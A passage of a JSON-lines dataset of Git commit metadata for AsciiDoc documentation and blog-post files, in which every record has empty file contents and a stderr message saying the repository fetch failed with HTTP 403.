13f79535-47bb-0310-9956-ffa450edef68\n","repos":"alien11689\/aries,apache\/aries,rotty3000\/aries,graben\/aries,apache\/aries,graben\/aries,graben\/aries,alien11689\/aries,alien11689\/aries,apache\/aries,alien11689\/aries,rotty3000\/aries,graben\/aries,rotty3000\/aries,apache\/aries,rotty3000\/aries","old_file":"transaction\/transaction-manager\/internals.adoc","new_file":"transaction\/transaction-manager\/internals.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/alien11689\/aries.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6b280d4738e3a8552addbc38056a894f43527d0f","subject":"Update 03_task_publishToConfluence.adoc","message":"Update 03_task_publishToConfluence.adoc\n\nfix typo","repos":"docToolchain\/docToolchain,docToolchain\/docToolchain,docToolchain\/docToolchain,jakubjab\/docToolchain,docToolchain\/docToolchain","old_file":"src\/docs\/manual\/03_task_publishToConfluence.adoc","new_file":"src\/docs\/manual\/03_task_publishToConfluence.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/docToolchain\/docToolchain.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2973c4012362b17bfe2039fdcafa4fa573e8bb09","subject":":memo: iView Setup","message":":memo: iView Setup\n","repos":"syon\/refills","old_file":"src\/refills\/nuxt\/iview-setup.adoc","new_file":"src\/refills\/nuxt\/iview-setup.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/syon\/refills.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"453348192ba3ef4436bac05905a4f55918ecd810","subject":"Update 2016-01-20-Which-external-storage-device-should-you-be-using-in-2016.adoc","message":"Update 2016-01-20-Which-external-storage-device-should-you-be-using-in-2016.adoc","repos":"YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io","old_file":"_posts\/2016-01-20-Which-external-storage-device-should-you-be-using-in-2016.adoc","new_file":"_posts\/2016-01-20-Which-external-storage-device-should-you-be-using-in-2016.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/YannBertrand\/yannbertrand.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8562a57488b2f150f33088908686fc876c754fb1","subject":"Added Stream Config EIP base docs","message":"Added Stream Config EIP base 
docs\n","repos":"apache\/camel,tdiesler\/camel,tadayosi\/camel,gnodet\/camel,onders86\/camel,davidkarlsen\/camel,snurmine\/camel,tadayosi\/camel,jamesnetherton\/camel,DariusX\/camel,zregvart\/camel,pmoerenhout\/camel,isavin\/camel,adessaigne\/camel,anoordover\/camel,ullgren\/camel,cunningt\/camel,sverkera\/camel,isavin\/camel,davidkarlsen\/camel,sverkera\/camel,objectiser\/camel,jamesnetherton\/camel,cunningt\/camel,rmarting\/camel,jonmcewen\/camel,Fabryprog\/camel,objectiser\/camel,pmoerenhout\/camel,rmarting\/camel,christophd\/camel,akhettar\/camel,mcollovati\/camel,Fabryprog\/camel,dmvolod\/camel,curso007\/camel,jonmcewen\/camel,davidkarlsen\/camel,curso007\/camel,Fabryprog\/camel,gnodet\/camel,tdiesler\/camel,kevinearls\/camel,christophd\/camel,alvinkwekel\/camel,nicolaferraro\/camel,isavin\/camel,akhettar\/camel,jamesnetherton\/camel,dmvolod\/camel,pax95\/camel,anoordover\/camel,adessaigne\/camel,nikhilvibhav\/camel,alvinkwekel\/camel,ullgren\/camel,rmarting\/camel,nikhilvibhav\/camel,cunningt\/camel,punkhorn\/camel-upstream,gautric\/camel,nicolaferraro\/camel,rmarting\/camel,gnodet\/camel,nikhilvibhav\/camel,pmoerenhout\/camel,onders86\/camel,pmoerenhout\/camel,objectiser\/camel,kevinearls\/camel,cunningt\/camel,adessaigne\/camel,pax95\/camel,curso007\/camel,gautric\/camel,zregvart\/camel,rmarting\/camel,tadayosi\/camel,DariusX\/camel,DariusX\/camel,curso007\/camel,christophd\/camel,christophd\/camel,pax95\/camel,apache\/camel,tdiesler\/camel,adessaigne\/camel,kevinearls\/camel,tdiesler\/camel,tadayosi\/camel,CodeSmell\/camel,CodeSmell\/camel,kevinearls\/camel,onders86\/camel,akhettar\/camel,pax95\/camel,anoordover\/camel,pax95\/camel,gautric\/camel,gnodet\/camel,onders86\/camel,tdiesler\/camel,jonmcewen\/camel,anoordover\/camel,akhettar\/camel,alvinkwekel\/camel,nikhilvibhav\/camel,apache\/camel,nicolaferraro\/camel,punkhorn\/camel-upstream,sverkera\/camel,jonmcewen\/camel,sverkera\/camel,isavin\/camel,kevinearls\/camel,alvinkwekel\/camel,CodeSmell\/camel,snurmine\/camel,jonmcewen\/camel,snurmine\/camel,jonmcewen\/camel,anoordover\/camel,akhettar\/camel,jamesnetherton\/camel,akhettar\/camel,CodeSmell\/camel,snurmine\/camel,ullgren\/camel,mcollovati\/camel,apache\/camel,cunningt\/camel,zregvart\/camel,curso007\/camel,dmvolod\/camel,apache\/camel,jamesnetherton\/camel,snurmine\/camel,nicolaferraro\/camel,Fabryprog\/camel,onders86\/camel,zregvart\/camel,objectiser\/camel,onders86\/camel,punkhorn\/camel-upstream,davidkarlsen\/camel,sverkera\/camel,sverkera\/camel,DariusX\/camel,christophd\/camel,tadayosi\/camel,adessaigne\/camel,curso007\/camel,dmvolod\/camel,apache\/camel,anoordover\/camel,jamesnetherton\/camel,isavin\/camel,mcollovati\/camel,dmvolod\/camel,tadayosi\/camel,pax95\/camel,mcollovati\/camel,tdiesler\/camel,punkhorn\/camel-upstream,dmvolod\/camel,christophd\/camel,pmoerenhout\/camel,gautric\/camel,pmoerenhout\/camel,cunningt\/camel,kevinearls\/camel,rmarting\/camel,ullgren\/camel,isavin\/camel,gautric\/camel,gautric\/camel,gnodet\/camel,snurmine\/camel,adessaigne\/camel","old_file":"camel-core\/src\/main\/docs\/eips\/stream-config-eip.adoc","new_file":"camel-core\/src\/main\/docs\/eips\/stream-config-eip.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pax95\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4ba5287091b6b2d291146b598f1a68daa1a99217","subject":"Update 2015-12-23-Python-Static-Instance-variable.adoc","message":"Update 
2015-12-23-Python-Static-Instance-variable.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-12-23-Python-Static-Instance-variable.adoc","new_file":"_posts\/2015-12-23-Python-Static-Instance-variable.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ee08427a7ef9a262aba51b6398a29e53dba0a039","subject":"Update 2016-03-31-Mensajes-ocultos-parte-1.adoc","message":"Update 2016-03-31-Mensajes-ocultos-parte-1.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-03-31-Mensajes-ocultos-parte-1.adoc","new_file":"_posts\/2016-03-31-Mensajes-ocultos-parte-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0173a18fa269f3efb79e4d00fac5a771fe51bf2e","subject":"experiment with asciidoc","message":"experiment with asciidoc\n","repos":"alphagov\/govuk-puppet,alphagov\/govuk-puppet,alphagov\/govuk-puppet,alphagov\/govuk-puppet,alphagov\/govuk-puppet,alphagov\/govuk-puppet","old_file":"STANDARDS.asciidoc","new_file":"STANDARDS.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/alphagov\/govuk-puppet.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b714fa21be37949e4882d1d8a6546526e39981c0","subject":"start adding documentation","message":"start adding documentation\n","repos":"scottmarlow\/wildfly-nosql","old_file":"doc\/README.adoc","new_file":"doc\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scottmarlow\/wildfly-nosql.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9e386737e674a3ea1b7c659d2cb8b93ef9b32c42","subject":"put kryo in the attic, will implement Avro soon instead.","message":"put kryo in the attic, will implement Avro soon instead.\n","repos":"microserviceux\/muon-java,microserviceux\/muon-java","old_file":"attic\/README.adoc","new_file":"attic\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/microserviceux\/muon-java.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"79a177fcad0ce0a6a995981f6e5d836e436d639a","subject":"added introduction, TOC and numbered paragraphs","message":"added introduction, TOC and numbered paragraphs\n","repos":"sergehuber\/contextserver-graphql-api","old_file":"docs\/index.adoc","new_file":"docs\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sergehuber\/contextserver-graphql-api.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"66272fa9a04040088d153858894bcbb07c4429d0","subject":"y2b create post Iron Man S6 Edge Unboxing!","message":"y2b create post Iron Man S6 Edge 
Unboxing!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-06-05-Iron-Man-S6-Edge-Unboxing.adoc","new_file":"_posts\/2015-06-05-Iron-Man-S6-Edge-Unboxing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"30598003e90b95af713822dad3a8ae2841a0fd1c","subject":"Update 2016-01-06-Study-with-Data-Structure.adoc","message":"Update 2016-01-06-Study-with-Data-Structure.adoc","repos":"hanwencheng\/hanwenblog,hanwencheng\/hanwenblog,hanwencheng\/hanwenblog","old_file":"_posts\/2016-01-06-Study-with-Data-Structure.adoc","new_file":"_posts\/2016-01-06-Study-with-Data-Structure.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hanwencheng\/hanwenblog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"09ea73b4fa3749ec46b630cd1e1cd17c29514623","subject":"Update 2016-07-31-How-to-be-more-productive.adoc","message":"Update 2016-07-31-How-to-be-more-productive.adoc","repos":"AppHat\/AppHat.github.io,AppHat\/AppHat.github.io,AppHat\/AppHat.github.io,AppHat\/AppHat.github.io","old_file":"_posts\/2016-07-31-How-to-be-more-productive.adoc","new_file":"_posts\/2016-07-31-How-to-be-more-productive.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/AppHat\/AppHat.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"eb5227057a0d626aae9d34f4c39bf0396f3cf2bf","subject":"add event","message":"add event\n","repos":"clojure\/clojure-site","old_file":"content\/events\/2018\/inclojure.adoc","new_file":"content\/events\/2018\/inclojure.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"ee803243775978a35c9cb693db10f6efe8d8c6f3","subject":"Partial doc for functor.","message":"Partial doc for functor.\n","repos":"alesguzik\/cats,OlegTheCat\/cats,mccraigmccraig\/cats,funcool\/cats,yurrriq\/cats,tcsavage\/cats","old_file":"doc\/cats.asciidoc","new_file":"doc\/cats.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/yurrriq\/cats.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"4499ab34dda8584f35b0bbd149f2ff05a6c19fd2","subject":"Update 2016-03-29-Python.adoc","message":"Update 2016-03-29-Python.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-03-29-Python.adoc","new_file":"_posts\/2016-03-29-Python.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"589af299d59670668833b72cc53ea9ffa14647fa","subject":"adding some clarifications and testing with the latest CE","message":"adding some clarifications and testing with the latest 
CE\n","repos":"ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs","old_file":"developer-tools\/java\/chapters\/ch11-bigdata.adoc","new_file":"developer-tools\/java\/chapters\/ch11-bigdata.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ManoMarks\/labs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d0a7602225c242f7bb0325a7e3bc71711e854e67","subject":"Update 2014-01-03-AssertJ-Neo4j-100-is-out.adoc","message":"Update 2014-01-03-AssertJ-Neo4j-100-is-out.adoc","repos":"fbiville\/fbiville.github.io,fbiville\/fbiville.github.io,fbiville\/fbiville.github.io,fbiville\/fbiville.github.io","old_file":"_posts\/2014-01-03-AssertJ-Neo4j-100-is-out.adoc","new_file":"_posts\/2014-01-03-AssertJ-Neo4j-100-is-out.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fbiville\/fbiville.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"cf62a847a4098ae1bea00ada51dab324b01eb71f","subject":"Update 2017-09-04-First-steps-with-Flutter.adoc","message":"Update 2017-09-04-First-steps-with-Flutter.adoc","repos":"triskell\/triskell.github.io,triskell\/triskell.github.io,triskell\/triskell.github.io,triskell\/triskell.github.io","old_file":"_posts\/2017-09-04-First-steps-with-Flutter.adoc","new_file":"_posts\/2017-09-04-First-steps-with-Flutter.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/triskell\/triskell.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f089cf6a93d848fad0e705d577c518641ee8b5b1","subject":"y2b create post The World's Smallest Drone!","message":"y2b create post The World's Smallest Drone!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-08-24-The-Worlds-Smallest-Drone.adoc","new_file":"_posts\/2016-08-24-The-Worlds-Smallest-Drone.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a1213636f360e5dff2da19fa5110ee1b2e4ae8ed","subject":"Update 2017-06-09-Pepper-Amazon-Rekognition.adoc","message":"Update 2017-06-09-Pepper-Amazon-Rekognition.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-06-09-Pepper-Amazon-Rekognition.adoc","new_file":"_posts\/2017-06-09-Pepper-Amazon-Rekognition.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d4100142ede3e60fb4928c9ced48acff3d57ac8f","subject":"Update 2015-08-27-B-Sdes-Las-Vegas-2015.adoc","message":"Update 
2015-08-27-B-Sdes-Las-Vegas-2015.adoc","repos":"polarbill\/polarbill.github.io,polarbill\/polarbill.github.io,polarbill\/polarbill.github.io,polarbill\/polarbill.github.io","old_file":"_posts\/2015-08-27-B-Sdes-Las-Vegas-2015.adoc","new_file":"_posts\/2015-08-27-B-Sdes-Las-Vegas-2015.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/polarbill\/polarbill.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9ec0d30b86fba10bc63d0062374dc42ea07479c6","subject":"Update 2016-04-01-S-Q-L-Injection-basic.adoc","message":"Update 2016-04-01-S-Q-L-Injection-basic.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-01-S-Q-L-Injection-basic.adoc","new_file":"_posts\/2016-04-01-S-Q-L-Injection-basic.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8b61dc6b4ad078bb200e2d1207fc333715a97f3e","subject":"Update 2016-12-02-exhibition-booth-tour.adoc","message":"Update 2016-12-02-exhibition-booth-tour.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-02-exhibition-booth-tour.adoc","new_file":"_posts\/2016-12-02-exhibition-booth-tour.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c911c64ab1ef1c8e9cbf9ae913ea4827d84aad2f","subject":"y2b create post DON'T Buy The iPhone X","message":"y2b create post DON'T Buy The iPhone X","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-11-26-DONT-Buy-The-iPhone-X.adoc","new_file":"_posts\/2017-11-26-DONT-Buy-The-iPhone-X.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e3e599130909662b7256b1f763ed1e95e2f13efd","subject":"Update 2015-11-28-Coucou.adoc","message":"Update 2015-11-28-Coucou.adoc","repos":"AntoineTyrex\/antoinetyrex.github.io,AntoineTyrex\/antoinetyrex.github.io,AntoineTyrex\/antoinetyrex.github.io","old_file":"_posts\/2015-11-28-Coucou.adoc","new_file":"_posts\/2015-11-28-Coucou.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/AntoineTyrex\/antoinetyrex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"50378e1c10a7f62e734a661e657d247cac8984f3","subject":"Update 2019-02-16-Citati.adoc","message":"Update 2019-02-16-Citati.adoc","repos":"IdoramNaed\/idoramnaed.github.io,IdoramNaed\/idoramnaed.github.io,IdoramNaed\/idoramnaed.github.io,IdoramNaed\/idoramnaed.github.io","old_file":"_posts\/2019-02-16-Citati.adoc","new_file":"_posts\/2019-02-16-Citati.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/IdoramNaed\/idoramnaed.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"edfa0e8260841e958e39ce8108e8889ef4626a51","subject":"Update Asciidoctor.adoc","message":"Update Asciidoctor.adoc","repos":"smru\/Documentation,smru\/Documentation","old_file":"Linux\/Asciidoctor.adoc","new_file":"Linux\/Asciidoctor.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/smru\/Documentation.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3ec0663d401bf1e10c91ca93e90aa53d89e2bd6f","subject":"adding some placeholders for future improvements","message":"adding some placeholders for future improvements\n","repos":"ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs","old_file":"developer-tools\/java\/chapters\/ch10-monitoring.adoc","new_file":"developer-tools\/java\/chapters\/ch10-monitoring.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ManoMarks\/labs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"66f530355417e809b20cd452b449363fe6b0c060","subject":"Update datamodel-forms.asciidoc (#10350)","message":"Update datamodel-forms.asciidoc (#10350)\n\nThis patch fixes the BinderValidationStatusHandler example in the documentation.","repos":"asashour\/framework,Darsstar\/framework,asashour\/framework,Darsstar\/framework,mstahv\/framework,asashour\/framework,mstahv\/framework,mstahv\/framework,Darsstar\/framework,mstahv\/framework,mstahv\/framework,Darsstar\/framework,asashour\/framework,Darsstar\/framework,asashour\/framework","old_file":"documentation\/datamodel\/datamodel-forms.asciidoc","new_file":"documentation\/datamodel\/datamodel-forms.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mstahv\/framework.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"52c2ca610b6f583f5ab2a068240e4f10cc279a9a","subject":"Polish AOP reference documentation","message":"Polish AOP reference documentation\n\n- fix formatting\n- fix syntax\n- use consistent example package name\n","repos":"spring-projects\/spring-framework,spring-projects\/spring-framework,spring-projects\/spring-framework,spring-projects\/spring-framework,spring-projects\/spring-framework,spring-projects\/spring-framework,spring-projects\/spring-framework","old_file":"src\/docs\/asciidoc\/core\/core-aop.adoc","new_file":"src\/docs\/asciidoc\/core\/core-aop.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/spring-projects\/spring-framework.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5b7ee3fd2f365f4c824191e3583cc8137161499c","subject":"Update 2016-11-20-The-Importance-of-Research.adoc","message":"Update 2016-11-20-The-Importance-of-Research.adoc","repos":"faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io","old_file":"_posts\/2016-11-20-The-Importance-of-Research.adoc","new_file":"_posts\/2016-11-20-The-Importance-of-Research.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/faldah\/faldah.github.io.git\/': The requested URL 
returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b1ed789bc5347ead7edd71133c7d220f6980d9e4","subject":"Update 2016-12-01-Salut.adoc","message":"Update 2016-12-01-Salut.adoc","repos":"Mediashare\/Mediashare.github.io,Mediashare\/Mediashare.github.io,Mediashare\/Mediashare.github.io,Mediashare\/Mediashare.github.io","old_file":"_posts\/2016-12-01-Salut.adoc","new_file":"_posts\/2016-12-01-Salut.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Mediashare\/Mediashare.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9ccbc54dca6fb4c7d144c192b47d0bbf7a29c708","subject":"Blogpost for Alpha4 announcement.","message":"Blogpost for Alpha4 announcement.\n","repos":"ctomc\/wildfly.org,stuartwdouglas\/wildfly.org,ctomc\/wildfly.org,luck3y\/wildfly.org,rhusar\/wildfly.org,luck3y\/wildfly.org,ctomc\/wildfly.org,adrianoschmidt\/wildfly.org,luck3y\/wildfly.org,adrianoschmidt\/wildfly.org,rhusar\/wildfly.org,stuartwdouglas\/wildfly.org,rhusar\/wildfly.org,rhusar\/wildfly.org,luck3y\/wildfly.org,adrianoschmidt\/wildfly.org,stuartwdouglas\/wildfly.org,adrianoschmidt\/wildfly.org,stuartwdouglas\/wildfly.org,ctomc\/wildfly.org","old_file":"news\/2015-08-19-WildFly-Swarm-Alpha4-Released.adoc","new_file":"news\/2015-08-19-WildFly-Swarm-Alpha4-Released.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rhusar\/wildfly.org.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4f9b0444539ddf3e2da55b1205b9ba53f0e8e136","subject":"Minor typo","message":"Minor typo","repos":"mbenson\/spring-cloud-config,mstine\/spring-cloud-config,mbenson\/spring-cloud-config,psbateman\/spring-cloud-config,thomasdarimont\/spring-cloud-config,royclarkson\/spring-cloud-config,shakuzen\/spring-cloud-config,shakuzen\/spring-cloud-config,marbon87\/spring-cloud-config,rajkumargithub\/spring-cloud-config,royclarkson\/spring-cloud-config,rajkumargithub\/spring-cloud-config,shakuzen\/spring-cloud-config,fangjing828\/spring-cloud-config,psbateman\/spring-cloud-config,appleman\/spring-cloud-config,fkissel\/spring-cloud-config,spring-cloud\/spring-cloud-config,fangjing828\/spring-cloud-config,thomasdarimont\/spring-cloud-config,mstine\/spring-cloud-config,mstine\/spring-cloud-config,thomasdarimont\/spring-cloud-config,appleman\/spring-cloud-config,spring-cloud\/spring-cloud-config,fkissel\/spring-cloud-config,rajkumargithub\/spring-cloud-config,spring-cloud\/spring-cloud-config,fkissel\/spring-cloud-config,psbateman\/spring-cloud-config,marbon87\/spring-cloud-config,mbenson\/spring-cloud-config,appleman\/spring-cloud-config,fangjing828\/spring-cloud-config,marbon87\/spring-cloud-config,royclarkson\/spring-cloud-config","old_file":"docs\/src\/main\/asciidoc\/spring-cloud-config.adoc","new_file":"docs\/src\/main\/asciidoc\/spring-cloud-config.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/thomasdarimont\/spring-cloud-config.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a9294e670c29e4016fd29d1ecd9ad86280351ac8","subject":"Update 2018-09-10-Go.adoc","message":"Update 
2018-09-10-Go.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-09-10-Go.adoc","new_file":"_posts\/2018-09-10-Go.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"acdf1ebd912e8e7642ab36e784235368dcc0e2a8","subject":"Update 2017-02-21.adoc","message":"Update 2017-02-21.adoc","repos":"luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io","old_file":"_posts\/2017-02-21.adoc","new_file":"_posts\/2017-02-21.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/luckypoem\/blog.hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"da5908f88f7036463120168647d5954f364fac15","subject":"Renamed '_posts\/2016-01-30-My-English-Title.adoc' to '_posts\/2016-01-30-prime.adoc'","message":"Renamed '_posts\/2016-01-30-My-English-Title.adoc' to '_posts\/2016-01-30-prime.adoc'","repos":"rorosaurus\/hubpress.io,rorosaurus\/hubpress.io,rorosaurus\/hubpress.io,rorosaurus\/hubpress.io","old_file":"_posts\/2016-01-30-prime.adoc","new_file":"_posts\/2016-01-30-prime.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rorosaurus\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d8be9f8f3e01701b00691bcb852a1ad4cafc7b02","subject":"Update 2017-09-20-short.adoc","message":"Update 2017-09-20-short.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2017-09-20-short.adoc","new_file":"_posts\/2017-09-20-short.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f437fc1e9a9a65eb67e163f9c40191bd1a209af1","subject":"Update 2018-05-28-G-A-S.adoc","message":"Update 2018-05-28-G-A-S.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-05-28-G-A-S.adoc","new_file":"_posts\/2018-05-28-G-A-S.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 